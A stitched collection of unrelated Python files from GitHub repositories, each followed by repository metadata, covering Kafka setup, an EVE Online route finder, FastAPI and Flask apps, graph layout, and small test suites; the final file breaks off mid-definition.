ac = AdminClient(conf)
res = ac.create_topics([NewTopic(topic, num_partitions=3, replication_factor=2)])
res[topic].result() | HagarIbrahiem/Kafka_ImgProcessing | admin.py | admin.py | py | 373 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "confluent_kafka.admin.AdminClient",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "confluent_kafka.admin.NewTopic",
"line_number": 10,
"usage_type": "call"
}
] |
7153685231 | # solarmap.py
import collections
import heapq
class SolarSystem:
    """One node of the solar map: a system id plus weighted connections."""

    def __init__(self, key):
        self.id = key
        # Maps neighbouring SolarSystem objects -> connection weight payload.
        self.connected_to = {}

    def add_neighbor(self, neighbor, weight):
        # Record (or overwrite) the link to *neighbor*.
        self.connected_to[neighbor] = weight

    def get_connections(self):
        # Dict key view of neighbouring systems.
        return self.connected_to.keys()

    def get_id(self):
        return self.id

    def get_weight(self, neighbor):
        # Raises KeyError if *neighbor* is not connected.
        return self.connected_to[neighbor]
class SolarMap:
"""
Solar map handler
"""
GATE = 0
WORMHOLE = 1
def __init__(self, eve_db):
    # eve_db: EVE universe database handle (opaque to this class).
    self.eve_db = eve_db
    # key -> SolarSystem node
    self.systems_list = {}
    self.total_systems = 0
def add_system(self, key):
    """Create, register and return a new SolarSystem node for *key*."""
    self.total_systems += 1
    new_system = SolarSystem(key)
    self.systems_list[key] = new_system
    return new_system
def get_system(self, key):
    """Return the SolarSystem registered under *key*, or None if unknown."""
    if key in self.systems_list:
        return self.systems_list[key]
    else:
        return None
def get_all_systems(self):
    # Returns a dict key view (not a list); callers must not mutate it.
    return self.systems_list.keys()
def add_connection(
    self,
    source,
    destination,
    con_type,
    con_info=None,
):
    """Add a bidirectional link between two systems, creating them on demand.

    con_type: SolarMap.GATE or SolarMap.WORMHOLE.
    con_info (wormholes only): [sig_source, code_source, sig_dest,
        code_dest, wh_size, wh_life, wh_mass, time_elapsed].
    """
    if source not in self.systems_list:
        self.add_system(source)
    if destination not in self.systems_list:
        self.add_system(destination)
    if con_type == SolarMap.GATE:
        # Gates carry no extra metadata; the weight payload is [GATE, None].
        self.systems_list[source].add_neighbor(self.systems_list[destination], [SolarMap.GATE, None])
        self.systems_list[destination].add_neighbor(self.systems_list[source], [SolarMap.GATE, None])
    elif con_type == SolarMap.WORMHOLE:
        # Each direction stores its own signature/code plus the shared state.
        [sig_source, code_source, sig_dest, code_dest, wh_size, wh_life, wh_mass, time_elapsed] = con_info
        self.systems_list[source].add_neighbor(
            self.systems_list[destination],
            [SolarMap.WORMHOLE, [sig_source, code_source, wh_size, wh_life, wh_mass, time_elapsed]]
        )
        self.systems_list[destination].add_neighbor(
            self.systems_list[source],
            [SolarMap.WORMHOLE, [sig_dest, code_dest, wh_size, wh_life, wh_mass, time_elapsed]]
        )
    else:
        # Unknown connection type: silently ignored (kept as-is).
        # you shouldn't be here
        pass
def __contains__(self, item):
return item in self.systems_list
def __iter__(self):
return iter(self.systems_list.values())
def shortest_path(
self,
source,
destination,
avoidance_list,
size_restriction,
ignore_eol,
ignore_masscrit,
age_threshold
):
path = []
size_restriction = set(size_restriction)
if source in self.systems_list and destination in self.systems_list:
if source == destination:
path = [source]
else:
queue = collections.deque()
visited = set([self.get_system(x) for x in avoidance_list])
parent = {}
# starting point
root = self.get_system(source)
queue.append(root)
visited.add(root)
while len(queue) > 0:
current_sys = queue.popleft()
if current_sys.get_id() == destination:
# Found!
path.append(destination)
while True:
parent_id = parent[current_sys].get_id()
path.append(parent_id)
if parent_id != source:
current_sys = parent[current_sys]
else:
path.reverse()
return path
else:
# Keep searching
for neighbor in [x for x in current_sys.get_connections() if x not in visited]:
# Connection check (gate or wormhole size)
[con_type, con_info] = current_sys.get_weight(neighbor)
if con_type == SolarMap.GATE:
proceed = True
elif con_type == SolarMap.WORMHOLE:
proceed = True
[_, _, wh_size, wh_life, wh_mass, time_elapsed] = con_info
if wh_size not in size_restriction:
proceed = False
elif ignore_eol and wh_life == 0:
proceed = False
elif ignore_masscrit and wh_mass == 0:
proceed = False
elif 0 < age_threshold < time_elapsed:
proceed = False
else:
proceed = False
if proceed:
parent[neighbor] = current_sys
visited.add(neighbor)
queue.append(neighbor)
return path
def shortest_path_weighted(
self,
source,
destination,
avoidance_list,
size_restriction,
security_prio,
ignore_eol,
ignore_masscrit,
age_threshold
):
path = []
size_restriction = set(size_restriction)
if source in self.systems_list and destination in self.systems_list:
if source == destination:
path = [source]
else:
priority_queue = []
visited = set([self.get_system(x) for x in avoidance_list])
distance = {}
parent = {}
# starting point
root = self.get_system(source)
distance[root] = 0
heapq.heappush(priority_queue, (distance[root], root))
while len(priority_queue) > 0:
(_, current_sys) = heapq.heappop(priority_queue)
visited.add(current_sys)
if current_sys.get_id() == destination:
# Found!
path.append(destination)
while True:
parent_id = parent[current_sys].get_id()
path.append(parent_id)
if parent_id != source:
current_sys = parent[current_sys]
else:
path.reverse()
return path
else:
# Keep searching
for neighbor in [x for x in current_sys.get_connections() if x not in visited]:
# Connection check (gate or wormhole size)
[con_type, con_info] = current_sys.get_weight(neighbor)
if con_type == SolarMap.GATE:
proceed = True
risk = security_prio[self.eve_db.system_type(neighbor.get_id())]
elif con_type == SolarMap.WORMHOLE:
proceed = True
risk = security_prio[3]
[_, _, wh_size, wh_life, wh_mass, time_elapsed] = con_info
if wh_size not in size_restriction:
proceed = False
elif ignore_eol and wh_life == 0:
proceed = False
elif ignore_masscrit and wh_mass == 0:
proceed = False
elif 0 < age_threshold < time_elapsed:
proceed = False
else:
proceed = False
if proceed:
if neighbor not in distance:
distance[neighbor] = float('inf')
if distance[neighbor] > distance[current_sys] + risk:
distance[neighbor] = distance[current_sys] + risk
heapq.heappush(priority_queue, (distance[neighbor], neighbor))
parent[neighbor] = current_sys
return path
| farshield/shortcircuit | src/shortcircuit/model/solarmap.py | solarmap.py | py | 8,726 | python | en | code | 56 | github-code | 6 | [
{
"api_name": "collections.deque",
"line_number": 109,
"usage_type": "call"
},
{
"api_name": "heapq.heappush",
"line_number": 187,
"usage_type": "call"
},
{
"api_name": "heapq.heappop",
"line_number": 190,
"usage_type": "call"
},
{
"api_name": "heapq.heappush",
... |
22759981162 | from fastapi import FastAPI
from fastapi.exceptions import RequestValidationError
from starlette.requests import Request
from starlette.responses import JSONResponse
from app import config as settings
from app.api.dependency import init_model
from app.api.v1.endpoint import router
from app.exceptions import APIException, APIExceptionErrorCodes, APIExceptionTypes
app = FastAPI(title=settings.PROJECT_NAME)
app.include_router(router)
@app.on_event("startup")
async def startup_event():
    # One-time initialisation at application startup (init_model
    # presumably loads the inference model -- see app.api.dependency).
    init_model()
@app.exception_handler(RequestValidationError)
async def validation_exception_handler(request: Request, exc: RequestValidationError) -> JSONResponse:
    """Translate FastAPI request-validation failures into the project's error envelope."""
    # SCHEMA_ERROR is an (error_code, http_status) pair.
    body = {
        "error": {
            "message": "schema error. please refer to data for details",
            "type": APIExceptionTypes.DATA_VALIDATION,
            "code": APIExceptionErrorCodes.SCHEMA_ERROR[0],
            "data": exc.errors(),
        }
    }
    return JSONResponse(status_code=APIExceptionErrorCodes.SCHEMA_ERROR[1], content=body)
@app.exception_handler(APIException)
async def api_exception_handler(request: Request, exc: APIException) -> JSONResponse:
    """Serialise a domain APIException using the status and content it carries."""
    content = exc.get_exception_content().dict()
    return JSONResponse(status_code=exc.status_code, content=content)
| SW13-Monstera/AI-server | app/main.py | main.py | py | 1,277 | python | en | code | 5 | github-code | 6 | [
{
"api_name": "fastapi.FastAPI",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "app.config.PROJECT_NAME",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "app.config",
"line_number": 11,
"usage_type": "name"
},
{
"api_name": "app.include_r... |
6767301700 | import json
from flask import Flask, request, Response
app = Flask(__name__)
required_fields = ['title', 'topics', 'ownerId', 'locationString']
tables = [
{
"tableId": 1,
"title": "TableC @ BostonHacks",
"topics": ["#masseffect", "#typescript", "#rickandmorty"],
"ownerId": 42,
"locationString": "Metcalf Hall, upstairs",
},
{
"tableId": 2,
"title": "Spline Reticulation",
"topics": ["#anything", "#anime"],
"ownerId": 69,
"locationString": "Sherman Gallery"
}
]
counter = 3
@app.route('/api/v1/tables', methods=['GET', 'POST'])
def table_resource():
    """List all tables (GET) or add a new one (POST).

    GET returns the full table list as JSON; POST validates and stores
    the JSON request body, answering with 204 on success or 400 when a
    required field is missing.
    """
    if request.method == 'GET':
        return Response(json.dumps(tables), mimetype='application/json')
    elif request.method == 'POST':
        # Bug fix: insert_into_dict returns an HTTP status code (400/204),
        # so it must be passed as the response *status*, not as the body.
        return Response(status=insert_into_dict(request.json))
def insert_into_dict(new_table: dict) -> int:
    """Validate *new_table* and append it to the in-memory table list.

    Returns an HTTP status code: 400 if any required field is missing,
    204 once the table has been stored with a freshly assigned tableId.
    Mutates the module-level ``tables`` list and ``counter``.
    """
    if not all(field in new_table for field in required_fields):
        return 400
    global counter
    new_table['tableId'] = counter
    tables.append(new_table)
    counter += 1
    return 204
if __name__ == '__main__':
app.run('0.0.0.0', 8069, debug=True)
| shawnrc/hackascraps_bu17 | dummy_api.py | dummy_api.py | py | 1,198 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "flask.Flask",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "flask.request.method",
"line_number": 28,
"usage_type": "attribute"
},
{
"api_name": "flask.request",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "flask.Response",
... |
30763371491 | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 28 13:39:19 2016
@author: Shahidur Rahman
"""
#import numpy as np;
#list declaration
#a_list = []
#b_list = []
#numpy array declaration
#left = np.array([])
#right = np.array([])
#convert the list to numpy array
#a = np.array(a_list)
#b = np.array(b_list)
#call the explorer library
import explorers
import stringRecorder
import pandas
from sqlalchemy import create_engine
import random
from mmh3 import hash128
i=0
#create sql connection
engine = create_engine('mysql+pymysql://root:shahidur_123@localhost:3306/mwt')
#open file and read
f = open(r"D:\Work\MWT\Data\VW_raw\rcv1.train.raw.txt")
try:
for line in f:
l=line.split("|")[0]
r=line.split("|")[1]
#a_list.append(l)
#b_list.append(r)
i=i+1
print(i)
#random number generator
epsilon = round(random.random(),3)
#print('\n'+'mwt : epsilon'+str(epsilon))
#unique key generation
unique_key =hash128('my string of doom ', seed=1234)
#print('mwt : unique_key '+str(unique_key))
#number of actions registered
noOfActions = 3
#print('mwt : noOfActions : '+str(noOfActions))
######################################################
#space for the policy action called
#to get the actionID for default policy
policyDecision = 3
#print('mwt : policyDecision : '+str(policyDecision))
scores = [1,2,3,4,5,6,7,8,9,10]
#for j in scores:
# print('mwt : scores : '+str(j))
######################################################
#print('mwt context : '+i)
callExplorer = explorers.explorers(epsilon,noOfActions,policyDecision,scores)
storeValues = callExplorer.algoSelection()
#print('storeValues : '+str(storeValues))
record = stringRecorder.stringRecorder(r, storeValues['actionID'], storeValues['actionProbability'], unique_key, storeValues['isExplore'], epsilon, noOfActions,policyDecision,storeValues['explorerAlgo'])
record=record.sewStrings()
#print('record : '+str(record))
#read data in data frame
#print('connection built')
colList="context,actionID,actionProbability,unique_key,isExplore,epsilon,noOfActions,policyDecision,explorerAlgo".split(',')
c1=['col1']
df = pandas.DataFrame(data=record,index=colList)
df=df.T
#print("printing panda df here")
#print(df)
#push data in sql
df.to_sql(con=engine, name='stringrecord', if_exists='append',index=False)
#close the opened file
finally:
f.close()
| skshahidur/nlp_paper_implementation | Word-Embedding/mwt.py | mwt.py | py | 2,843 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "sqlalchemy.create_engine",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "random.random",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "mmh3.hash128",
"line_number": 48,
"usage_type": "call"
},
{
"api_name": "explorers.explore... |
2169470310 | import psycopg
from matplotlib import pyplot as plt
import numpy as np
import datetime
DB_NAME = "########"
DB_USER = "########"
DB_PASSWORD = "########"
conn = psycopg.connect(
dbname=DB_NAME,
user=DB_USER,
password=DB_PASSWORD)
def LoadQuery(fileName):
    """Return the contents of tools/Queries/<fileName>.sql as a string.

    Uses a context manager so the handle is closed promptly (the original
    left the file open until garbage collection).
    """
    with open(f"tools/Queries/{fileName}.sql", "r") as query_file:
        return query_file.read()
def test_register_date_karma_hist(capsys):
    """Render a stacked histogram of user registration years split by karma sign."""
    registerDate = LoadQuery("registerDate")
    registerDatePositiveKarma = LoadQuery("registerDatePositiveKarma")
    registerDateZeroKarma = LoadQuery("registerDateZeroKarma")
    registerDateNegativeKarma = LoadQuery("registerDateNegativeKarma")
    with capsys.disabled():
        with conn.cursor() as cur:
            fig, ax1 = plt.subplots()
            # All users: establishes the 18 yearly bins covering 2006-2024.
            cur.execute(registerDate)
            res = cur.fetchall()
            y = np.array([t[0].timestamp() for t in res])
            print(len(res))
            years = [x for x in range(2006, 2025)]
            plt.xticks(range(2006, 2025, 2))
            hist_all = np.histogram(y, 18, (datetime.datetime(2006, 1, 1).timestamp(), datetime.datetime(2024, 1, 1).timestamp()))
            bottom = np.zeros(len(hist_all[0]))
            # Negative-karma users (semi-transparent red), first stack layer.
            cur.execute(registerDateNegativeKarma)
            res = cur.fetchall()
            y = np.array([t[0].timestamp() for t in res])
            print(len(res))
            hist_negative = np.histogram(y, 18, (datetime.datetime(2006, 1, 1).timestamp(), datetime.datetime(2024, 1, 1).timestamp()))
            hist_n = hist_negative[0]
            ax1.bar(years[:-1], hist_n, width=np.diff(years), align="edge", color=(1,0,0,0.5), bottom=bottom)
            bottom += hist_n
            # Positive-karma users (green), stacked on top of negative.
            cur.execute(registerDatePositiveKarma)
            res = cur.fetchall()
            y = np.array([t[0].timestamp() for t in res])
            print(len(res))
            hist_positive = np.histogram(y, 18, (datetime.datetime(2006, 1, 1).timestamp(), datetime.datetime(2024, 1, 1).timestamp()))
            hist_p = hist_positive[0]
            ax1.bar(years[:-1], hist_p, width=np.diff(years), align="edge", color=(0,1,0,0.5), bottom=bottom)
            bottom += hist_p
            # Zero-karma users (blue), final stack layer.
            cur.execute(registerDateZeroKarma)
            res = cur.fetchall()
            y = np.array([t[0].timestamp() for t in res])
            print(len(res))
            hist_zero = np.histogram(y, 18, (datetime.datetime(2006, 1, 1).timestamp(), datetime.datetime(2024, 1, 1).timestamp()))
            hist_z = hist_zero[0]
            ax1.bar(years[:-1], hist_z, width=np.diff(years), align="edge", color=(0,0,1,0.5), bottom=bottom)
            bottom += hist_z
            # Transparent black outline of the all-users histogram for reference.
            ax1.bar(years[:-1], hist_all[0], width=np.diff(years), edgecolor="black", align="edge", color=(0,0,1,0))
            fig.tight_layout()
            plt.savefig(fname=f"./pics/analitics/register_date_karma_distr.png", bbox_inches='tight', dpi=200)
| AS2/habrolink | tools/Analitics/test_register_karma_hist.py | test_register_karma_hist.py | py | 2,940 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "psycopg.connect",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.subplots",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "numpy.ar... |
42483897749 | import networkx as nx
def hierarchical_layout(G: nx.Graph) -> tuple:
    """Function to create dictionary with positions of nodes with hierarchical
    arrangement.

    Levels are derived from shortest-path distance to the root node 'CA'
    (2 -> aggregate, 3 -> sub-facility 1, 4 -> sub-facility 2); each node
    is assigned to the loan ('01') or non-loan ('02') branch by whichever
    section node is closer.  Loan nodes extend to negative x, non-loan to
    positive x.

    Paramaters:
    -----------
    G: nx.Graph
        NetworkX Graph object containing 'CA', '01', '02' and facility nodes.

    Returns:
        (float, float, dict)
        Tuple with canvas size for the loan and non-loan sides, and a
        dictionary mapping node -> (x, y) coordinate tuple.
    """
    # Record shortest distance between node pairs (to evaluate hierarchy levels)
    spl = dict(nx.all_pairs_shortest_path_length(G))
    # Count number of nodes for agg, sub1, sub2 levels
    agg = []
    sub1 = []
    sub2 = []
    for node in list(G.nodes()):
        if spl['CA'][node] == 2:
            agg.append(node)
        elif spl['CA'][node] == 3:
            sub1.append(node)
        elif spl['CA'][node] == 4:
            sub2.append(node)
    # Attribute agg, sub1, sub2 containers to loan or non-loan
    loan = []
    non_loan = []
    for node in list(G.nodes()):
        if spl['01'][node] > spl['02'][node]:
            non_loan.append(node)
        else:
            loan.append(node)
    # Resize canvas based on how many nodes are present (loan)
    largest_row_loan = max(
        [
            len([x for x in agg if x in loan]),
            len([x for x in sub1 if x in loan]),
            len([x for x in sub2 if x in loan]),
        ]
    )
    if largest_row_loan > 4:
        canvas_loan_size = 0.25 * largest_row_loan
    else:
        canvas_loan_size = 1
    # Resize canvas based on how many nodes are present (non-loan)
    largest_row_nonloan = max(
        [
            len([x for x in agg if x in non_loan]),
            len([x for x in sub1 if x in non_loan]),
            len([x for x in sub2 if x in non_loan]),
        ]
    )
    if largest_row_nonloan > 4:
        # Bug fix: scale by the non-loan row width (the original used
        # largest_row_loan here, a copy-paste slip from the loan branch).
        canvas_nonloan_size = 0.3 * largest_row_nonloan
    else:
        canvas_nonloan_size = 1
    # Define canvas size for lower levels.
    # NOTE(review): assumes each branch has at least one agg and one sub1
    # node, otherwise these divisions raise ZeroDivisionError -- confirm.
    canvas_loan_size_sub1 = canvas_loan_size / len([x for x in agg if x in loan])
    canvas_loan_size_sub2 = canvas_loan_size / len([x for x in sub1 if x in loan])
    canvas_nonloan_size_sub1 = canvas_nonloan_size / len([x for x in agg if x in non_loan])
    canvas_nonloan_size_sub2 = canvas_nonloan_size / len([x for x in sub1 if x in non_loan])
    # Assign x, y coordinates to nodes
    agg_loan_iter = 0
    agg_nonloan_iter = 0
    position = {}
    # CA, sections, and agg-fac; sub1/sub2 nodes receive provisional
    # positions here and are overwritten by the loops below.
    for node in list(G.nodes()):
        if node == 'CA':
            x, y = 0, 0.8
        elif node == '01':
            x, y = -0.5, 0.4
        elif node == '02':
            x, y = 0.5, 0.4
        else:
            if node in loan:
                if node in agg:
                    x = - (0.5 + agg_loan_iter) * canvas_loan_size / len([x for x in agg if x in loan])
                    y = 0
                    agg_loan_iter += 1
            elif node in non_loan:
                if node in agg:
                    x = (0.5 + agg_nonloan_iter) * canvas_nonloan_size / len([x for x in agg if x in non_loan])
                    y = 0
                    agg_nonloan_iter += 1
        position[node] = (x, y)
    # sub-fac 1: children centred under their parent aggregate node
    for node in [x for x in agg if x in loan]:
        sub1_loan_iter = 0
        children = [y for y in G.neighbors(node) if y in sub1]
        for child in children:
            x0 = position[node][0]
            x = (x0 + 0.5 * canvas_loan_size_sub1) - (0.5 + sub1_loan_iter) * canvas_loan_size_sub1 / len(children)
            y = - 0.4
            sub1_loan_iter += 1
            position[child] = (x, y)
    for node in [x for x in agg if x in non_loan]:
        sub1_nonloan_iter = 0
        children = [y for y in G.neighbors(node) if y in sub1]
        for child in children:
            x0 = position[node][0]
            x = (x0 - 0.5 * canvas_nonloan_size_sub1) + (0.5 + sub1_nonloan_iter) * canvas_nonloan_size_sub1 / len(children)
            y = - 0.4
            sub1_nonloan_iter += 1
            position[child] = (x, y)
    # sub-fac 2: same scheme one level further down
    for node in [x for x in sub1 if x in loan]:
        sub2_loan_iter = 0
        children = [y for y in G.neighbors(node) if y in sub2]
        for child in children:
            x0 = position[node][0]
            x = (x0 + 0.5 * canvas_loan_size_sub2) - (0.5 + sub2_loan_iter) * canvas_loan_size_sub2 / len(children)
            y = - 0.8
            sub2_loan_iter += 1
            position[child] = (x, y)
    for node in [x for x in sub1 if x in non_loan]:
        sub2_nonloan_iter = 0
        children = [y for y in G.neighbors(node) if y in sub2]
        for child in children:
            x0 = position[node][0]
            x = (x0 - 0.5 * canvas_nonloan_size_sub2) + (0.5 + sub2_nonloan_iter) * canvas_nonloan_size_sub2 / len(children)
            y = - 0.8
            sub2_nonloan_iter += 1
            position[child] = (x, y)
    return canvas_loan_size, canvas_nonloan_size, position
| diegopintossi/graph_network | custom_hierarchical_layout.py | custom_hierarchical_layout.py | py | 6,468 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "networkx.Graph",
"line_number": 4,
"usage_type": "attribute"
},
{
"api_name": "networkx.all_pairs_shortest_path_length",
"line_number": 20,
"usage_type": "call"
}
] |
21998646716 | from typing import List
from collections import defaultdict
class Solution:
    def countPairs(self, deliciousness: List[int]) -> int:
        """Count index pairs (i, j), i < j, whose element sum is a power of two.

        One pass with a frequency map: for each element, add the number of
        previously seen elements that complete it to every candidate power
        of two (up to 2 * max), then record the element itself.  Result is
        returned modulo 1_000_000_007 as the problem requires.
        """
        maxsum = max(deliciousness) * 2
        pairs = 0
        seen = defaultdict(int)
        for value in deliciousness:
            power = 1
            while power <= maxsum:
                # Earlier elements equal to (power - value) pair with value.
                pairs += seen[power - value]
                power <<= 1
            # Bug fix: record the element under its own value.  The original
            # did `dd[s - i] += 1` after the loop, storing the key
            # (final_power - value), which never matches any later lookup,
            # so every input produced 0.
            seen[value] += 1
        return pairs % 1000000007
| hangwudy/leetcode | 1700-1799/1711. 大餐计数.py | 1711. 大餐计数.py | py | 456 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "typing.List",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "collections.defaultdict",
"line_number": 9,
"usage_type": "call"
}
] |
39672826344 | import protocol
import pytest
class TestBitstream:
    """Unit tests for protocol.Bitstream hex parsing and bit extraction."""
    @pytest.mark.parametrize(
        "s,val",
        [
            ("", []),
            ("1", [0x10000000]),
            ("01", [0x01000000]),
            ("0102", [0x01020000]),
            ("0102030405", [0x01020304, 0x05000000]),
        ],
    )
    def test_from_string(self, s, val):
        # Hex digits are packed into left-aligned 32-bit words, zero-padded
        # on the right when the string does not fill a whole word.
        bs = protocol.Bitstream.from_string(s)
        assert bs._data == val
    @pytest.mark.parametrize(
        "data,num,val",
        [
            ([], 0, 0),
            ([0xA0000000], 1, 1),
            ([0xA0000000], 2, 2),
            ([0x00000001], 32, 1),
            ([0x00000001, 0x80000000], 33, 3),
        ],
    )
    def test_get_bits(self, data, num, val):
        # get_bits consumes `num` bits MSB-first, spanning word boundaries.
        bs = protocol.Bitstream(data)
        assert bs.get_bits(num) == val
    @pytest.mark.parametrize(
        "data,num,val",
        [
            ([0x12340000], [2, 2, 4, 8], [0, 1, 2, 0x34]),
        ],
    )
    def test_get_bits_multiple(self, data, num, val):
        # Consecutive reads continue from the previous read position.
        bs = protocol.Bitstream(data)
        for i in range(len(num)):
            assert bs.get_bits(num[i]) == val[i]
class TestProtocol:
    """End-to-end parse of the AoC 2021 day-16 example packet D2FE28."""
    def test_read_packet(self):
        # D2FE28 decodes to version 6, type 4 (literal), value 2021,
        # having consumed 15 payload bits.
        bs = protocol.Bitstream.from_string("D2FE28")
        p = protocol.Parser(bs)
        assert p.read_version() == 6
        assert p.read_type() == 4
        assert p.read_literal() == (2021, 15)
| cmatsuoka/aoc | 2021 - submarine/16 - bitstream protocol/test_protocol.py | test_protocol.py | py | 1,376 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "protocol.Bitstream.from_string",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "protocol.Bitstream",
"line_number": 18,
"usage_type": "attribute"
},
{
"api_name": "pytest.mark.parametrize",
"line_number": 7,
"usage_type": "call"
},
{
"api... |
2311755172 | import logging
import pathlib
import requests
import os
from pathlib import Path
from typing import Dict
from PIL.Image import Image
from result import Result, Ok, Err, Some
from definitions import EXT_API_SAVE_QUOTE_URL, EXT_API_OUTPUT_URL
from models import ImRequest
_logger = logging.getLogger(__name__)
class QuoteImUtils:
    """Helpers for validating quote-image requests and shipping images to the external API."""
    @staticmethod
    def parse_req_dict( some_dict: Dict ) -> ImRequest:
        """Validate a raw request dict into an ImRequest; on failure return
        an empty ImRequest carrying the exception in .errs."""
        try:
            errs, validated = ImRequest.parser(some_dict)
            validated.errs = errs
            return validated
        except Exception as err:
            _logger.error( err, exc_info=True )
            im_req = ImRequest()
            im_req.errs = [err]
            return im_req
    @staticmethod
    def send_to_ext_api( filename: str , filepath: str, default_url: str ) -> Result[str, Exception]:
        """Upload the image at *filepath* to the external save endpoint.

        Returns Ok(image_url) on HTTP 200, a fallback value wrapping
        *default_url* on other statuses, and Err(exception) on failure.
        """
        # Secret key/value pair is appended to the URL as a query parameter.
        s_key: str = os.environ['API_SECRET_KEY']
        s_value: str = os.environ['API_SECRET_VAL']
        url = f'{EXT_API_SAVE_QUOTE_URL}?{s_key}={s_value}'
        try:
            with open( filepath, 'rb' ) as im_file:
                # NOTE(review): this PIL import is unused in this scope.
                from PIL import Image as Im
                payload={}
                files=[( 'quote', (filename , im_file, 'image/png') )]
                headers = {
                    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
                }
                response = requests.post( url, headers=headers, data=payload, files=files)
                if response and response.status_code == 200:
                    im_url: str = f'{EXT_API_OUTPUT_URL}/(unknown)'
                    return Ok( im_url )
                else:
                    # NOTE(review): logger.warn is deprecated (use warning),
                    # and im_url below is assigned but never used.
                    _logger.warn( response.headers )
                    _logger.warn( response.text )
                    _logger.warn( f'"{url}"' )
                    im_url: str = f'{EXT_API_OUTPUT_URL}/default.png'
                    # NOTE(review): Some(...) is not an Ok/Err Result variant;
                    # callers matching on Result may not handle it -- confirm.
                    return Some(default_url)
        except Exception as err:
            _logger.error(err, exc_info=True)
            return Err(err)
    @staticmethod
    def save_im_as( img: Image, filename: str , filepath: str ) -> Result[None, Exception]:
        """Save *img* to *filepath*; alpha is kept only for .png filenames.

        Returns Ok(None) on success, Err(exception) otherwise.
        """
        keep_alpha: bool = False
        if img is None:
            return Err( ValueError('Image is None') )
        try:
            file_extension = pathlib.Path(filename).suffix
            keep_alpha = file_extension == '.png' or file_extension == '.PNG'
        except Exception:
            keep_alpha = False
        try:
            im_clone = img
            # Non-PNG targets cannot carry alpha, so flatten to RGB first.
            if not keep_alpha:
                im_clone = im_clone.convert('RGB')
            im_clone.save( filepath )
            return Ok( None )
        except Exception as err:
            _logger.error( err, exc_info=True )
            return Err( err )
    @staticmethod
    def save_im_as_b64( filename: str , filepath: str, default_url: str ):
        # Unimplemented placeholder.
        pass
    @staticmethod
    def send_to_ext_api_b64( filename: str , filepath: str, default_url: str ):
        # Unimplemented placeholder (the tuple expression has no effect).
        (800,600)
    @staticmethod
    def img_already_exists_ext_api( filename: str ) -> bool:
        """Return True if the external API already serves an image (HTTP 200)."""
        url: str = f'{EXT_API_OUTPUT_URL}/(unknown)'
        headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36'
        }
        try:
            response = requests.get( url, headers=headers )
            return response.status_code == 200
        except Exception as err:
            _logger.error(err)
            return False
    @staticmethod
    def img_already_exists_local( filepath: str ) -> bool:
        """Return True if *filepath* exists as a regular file."""
        path = Path(filepath)
        return path.is_file()
| lcapuano-app/quote-image-generator | src/imquote/qt_im_utils.py | qt_im_utils.py | py | 3,700 | python | en | code | 0 | github-code | 6 | [
{
"api_name": "logging.getLogger",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "typing.Dict",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "models.ImRequest.parser",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "models.ImReques... |
43972979596 | import argparse
import re
# CPT tools
from wp_tools import CPTLink
def parse_inputs(text, file, galaxy_mode=False):
    """
    Parses the inputs of a text box and new line separated pacc file.

    Galaxy replaces newlines in text-box input with the literal token
    "__cn__", so a single element containing that token is split apart.
    Raises Exception when neither source yields any accession.
    """
    accs = []
    if text:
        if re.search("__cn__", str(text[0])):
            accs.extend(text[0].split("__cn__"))
        else:
            accs.extend(text)
    if file:
        # Re-open by name (file is typically an argparse.FileType handle)
        # inside a context manager; the original leaked the second handle.
        with open(file.name) as acc_file:
            accs.extend(acc_file.read().splitlines())
    if not accs:
        raise Exception("No accessions used, check file and input.")
    return accs
def parse_email(email):
    """
    Parses user input email and appends CPT Admins to NCBI email.

    Galaxy encodes "@" as "__at__"; every occurrence is restored (the
    original only handled a single occurrence via split).  The admin
    addresses are appended and the list is joined with ";".

    Raises:
        Exception: when *email* is None (or otherwise not a string).
    """
    ADMINS = ["curtisross@tamu.edu", "cory.maughmer@tamu.edu", "anthonyc@tamu.edu"]
    try:
        if "__at__" in email:
            email = email.replace("__at__", "@")
    except TypeError:
        raise Exception("Please Insert Email Address")
    return ";".join([email] + ADMINS)
def write_table(list_of_data, file):
    """Write a TSV report of accession data produced by CPTLink.

    Each entry of *list_of_data* is (wp_accession, genome_rows, wp_count),
    where genome_rows is a list of (genome_acc, tax_id, organism) rows.
    The file handle is closed when the `with` block finishes.
    """
    with file as out:
        out.write(f"WP_accession\tGenome_accession\tTaxID\tOrganism\tWP_count\n")
        for entry in list_of_data:
            wp_acc, genome_rows, wp_count = entry[0], entry[1], entry[2]
            for row in genome_rows:
                out.write(f"{wp_acc}\t{row[0]}\t{row[1]}\t{row[2]}\t{wp_count}\n")
def write_gaccs(list_of_data, file):
    """
    writes output gacc file, uses list of data from CPTlink output
    """
    # NOTE(review): despite the docstring, this only prints each entry to
    # stdout; the *file* handle is never written to -- confirm intent.
    for acc in list_of_data:
        print(acc)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Retrieve information from a WP accession"
)
parser.add_argument(
"--wp_text",
nargs="*",
help="WP accessions, separated by __cn__ for Galaxy, or space for offline"
)
parser.add_argument(
"--wp_file",
type=argparse.FileType("r"),
help="New line separated WP accessions file"
)
parser.add_argument(
"--api_key",
